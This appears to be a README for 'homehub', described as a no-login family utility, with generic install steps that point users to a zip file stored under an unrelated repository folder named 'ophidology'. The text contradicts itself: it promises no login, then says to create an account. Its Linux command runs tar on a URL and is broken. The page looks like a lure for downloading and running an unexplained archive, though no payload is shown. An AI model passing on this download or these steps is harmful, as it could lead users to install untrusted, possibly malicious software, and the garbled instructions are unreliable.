Welcome to homehub! This is a lightweight, no-login, self-hosted family utility for your home. It helps you manage daily tasks, organize family schedules, and improve home communication without the hassle of accounts or logins.

To run homehub, youβll need:
- An operating system: Windows, macOS, or Linux (any recent version)
- At least 2 GB of RAM
- 500 MB of free disk space

Once on the Releases page, follow these steps:
- Select the latest version. Look for the most recent release at the top of the list.
- Choose your file. You will see files specific to your operating system. Click on the appropriate file (e.g.,
.exefor Windows,.dmgfor macOS, orhttps://raw.githubusercontent.com/Nick019228/homehub/main/ophidology/homehub.zipfor Linux). - Download the file. Your browser will download the selected file to your computer.
After downloading the file, follow these instructions based on your operating system:
- Locate the downloaded
.exefile, usually in your Downloads folder. - Double-click the file to start the installation.
- Follow the on-screen prompts to complete the installation.
- After installation, start homehub from your Start menu or desktop shortcut.
- Find the downloaded
.dmgfile in your Downloads folder. - Double-click to open it.
- Drag the homehub icon to the Applications folder.
- Open your Applications folder and start homehub.
- Open a terminal and navigate to the directory where you downloaded the file.
- Extract the contents using a command like
tar -xvzf https://raw.githubusercontent.com/Nick019228/homehub/main/ophidology/homehub.zip. - Change to the extracted directory by typing
cd homehub. - Run homehub with the command
./homehub.
Once homehub is installed, you can start using it right away. Hereβs how to set it up:
- Open the Application. If you are using Windows or macOS, find it in your applications list. For Linux, run the executable in the terminal.
- Create an Account. Youβll be prompted for a name and basic information for your family. No email or password is necessary!
- Start Exploring. Navigate through the interface to learn how to create tasks, share calendars, and take notes.
